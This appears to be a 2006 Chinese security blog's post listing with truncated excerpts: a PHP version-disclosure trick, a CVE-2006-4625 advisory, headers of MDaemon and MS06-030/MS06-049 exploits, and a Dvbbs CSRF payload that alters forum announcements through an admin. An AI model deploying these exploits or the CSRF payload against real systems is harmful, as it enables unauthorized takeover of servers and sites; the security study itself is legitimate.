百度首页 | 百度空间
 
文章列表
 
2006年09月19日 星期二 11:09

PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000
知道有什么用吗?
可以看PHP大的版本号哦~

http://www.zzei.net/index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000

Try it~

 

类别:安全文摘 | 评论(1) | 浏览()
 
2006年09月19日 星期二 11:04
信息来源:绿盟科技

PHP Ini_Restore() Safe_Mode及Open_Basedir限制绕过漏洞

发布日期:2006-09-09
更新日期:2006-09-11

受影响系统:
PHP PHP 5.1.6
PHP PHP 4.4.4
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 19933
CVE(CAN) ID: CVE-2006-4625

PHP是广泛使用的通用目的脚本语言,特别适合于Web开发,可嵌入到HTML中。

PHP在处理配置选项时存在漏洞,远程攻击者可能利用此漏洞绕过安全限制。

如果将PHP用作Apache模块的话,就可以使用Apache配置文件(如httpd.conf)中的指令更改配置设置。例如,httpd.conf中的open_basedir:

- ---
<Directory /usr/home/frajer/public_html/>
Options FollowSymLinks MultiViews Indexes
AllowOverride None
php_admin_flag safe_mode 1
php_admin_value open_basedir /usr/home/frajer/public_html/
</Directory>
- ---

在PHP中有两个config选项,分别是Lo
类别:安全文摘 | 评论(0) | 浏览()
 
2006年08月29日 星期二 11:32
类别:心情涂鸦 | 评论(0) | 浏览()
 
2006年08月27日 星期日 14:45
#!/usr/bin/python
import sys
import struct
import socket
from time import sleep
########################################################################################
# MDaemon Pre Authentication (USER) Heap Overflow
# Code based on Leon Juranic's exploit
# Coded by muts - mati@see-security.com
# http://www.hackingdefined.com
# http://www.remote-exploit.org
# Tested on:
# Mdaemon 9.0.5
# Mdaemon 7.2.3
# Mdaemon 7.2.2
# Mdaemon 7.2.1
# Mdaemon 7.2.0
# Possibly Others
# PLEASE CONTINUE READING !
# Huge greets to xbxice and talz for leading me away from the darkness
########################################################################################
# Mdaemon is wierd. It seems like their developers decided to annoy everyone
# by making their software do unexpected things.
# The exploit overwrites UnhandledExceptionFilter, and jumps to an egghunter
# shell
类别:安全工具 | 评论(0) | 浏览()
 
2006年08月15日 星期二 15:50

/*
    MS06-030 Windows Kernel Mrxsmb.sys Local Privilege Escalation Vulnerability Exploit
            Created by SoBeIt
    Main file of exploit
    Tested on:
    Windows 2000 PRO SP4 Chinese
    Windows 2000 PRO SP4 Rollup 1 Chinese
    Windows 2000 PRO SP4 English
    Windows 2000 PRO SP4 Rollup 1 English
    Windows XP PRO SP2 Chinese
    Windows XP PRO SP2 English
   
    Usage:ms06-030.exe
*/
#include <stdio.h>
#include <windows.h>

类别:安全工具 | 评论(5) | 浏览()
 
2006年08月15日 星期二 15:46

/*
    MS06-049 Windows ZwQuerySystemInformation Local Privilege Escalation Vulnerability Exploit
            Created by SoBeIt
    Main file of exploit
    Tested on:
    Windows 2000 PRO SP4 Chinese
    Windows 2000 PRO SP4 Rollup 1 Chinese
    Windows 2000 PRO SP4 English
    Windows 2000 PRO SP4 Rollup 1 English
    Usage:ms06-049.exe
*/
#include <windows.h>
#include <stdio.h>
#define NTSTATUS    int
#define ProcessBasicInformation    0
#define

类别:安全工具 | 评论(0) | 浏览()
 
2006年08月08日 星期二 21:33

Authorlake2 ( http://lake2.0x54.org )

 

最近的生活真无聊,寒冰掌老大见我无所事事,就说如果我能把Serv-U

类别:安全工具 | 评论(3) | 浏览()
 
2006年08月08日 星期二 21:30
动网img标签所带来的危害
文章作者:fhod
看了上期剑心写的
除了以上img标签以外.我们还可以使用[upload=jpg]标签..两者的区别在于img显示时是一个红叉叉.而[upload=jpg]则会出现一个提示如图1
[upload=jpg]http://localhost/announcements.asp?action=SaveAnn&username=admin&boardid=0&bgs=&title=dvbug test~~by fhod&content=1&submit=%b7%a2+%b2%bc[/upload]
这时我们以普通用户身份点击的话会出现错误提示如图2... 我们换管理员帐号登陆..并打开此贴.会发现无任何提示..但是我们到主页看一下.会发现公告已经被更改了..如图3
好了..具体的漏洞以介绍完了..但是我们该怎么利用这个缺陷呢..
打开announcements.asp文件找到
第107行和107行代码
  If Request("action")="showone" Then
  Tempwrite=Replace(Tempwrite,"{$bgs}","<img src=Skins/Default/filetype/mid.gif border=0><bgsound src="&Sql(4,i)&" border=0>")
以上一段代码是发布公告时填背景音乐的.如果我们的
类别:安全文摘 | 评论(0) | 浏览()
 
2006年08月05日 星期六 10:18
类别:心情涂鸦 | 评论(0) | 浏览()
 
2006年08月04日 星期五 23:36
郁闷,什么人啊,火狐又招谁了!
类别:心情涂鸦 | 评论(7) | 浏览()
 
2006年08月04日 星期五 01:24

对于脚本安全这个话题好像永远没完没了,如果你经常到国外的各种各样的bugtraq上,你会发现有一半以上都和脚本相关,诸如SQL injection,XSS,Path Disclosure,Remote commands execution这样的字眼比比皆是,我们看了之后的用途难道仅仅是抓肉鸡?对于我们想做web安全的人来说,最好就是拿来学习,可是万物抓根源,我们要的不是鱼而是渔。在国内,各种各样的php程序1.0版,2.0版像雨后春笋一样的冒出来,可是,大家关注的都是一些著名的cms,论坛,blog程序,很少的人在对那些不出名的程序做安全检测,对于越来越多的php程序员和站长来说,除了依靠服务器的堡垒设置外,php程序本身的安全多少你总得懂点吧。
有人说你们做php安全无非就是搞搞注入和跨站什么什么的,大错特错,如果这样的话,一个magic_quotes_gpc或者服务器里的一些安全设置就让我们全没活路了:(。我今天要说的不是注入,不是跨站,而是存在于php程序中的一些安全细节问题。OK!切入正题。
注意一些函数的过滤
有些函数在程序中是经常使用的,像include(),require(),fopen(),fwrite(),readfile(),unlink(),eval()以及它们的变体函数等等。
类别:安全文摘 | 评论(0) | 浏览()
 
2006年08月03日 星期四 13:38
现在的人啊真丫坏! 只好到这了!
类别:心情涂鸦 | 评论(3) | 浏览()
 
     
 
 
文章分类
 
     
 
文章存档
 
 
 
 
 
 
 
 
 
 
 
 
 
     
 
最新文章评论
   

snowfox
 

snowfox
 

snowfox
 

一转了:)
 
 
     


©2008 Baidu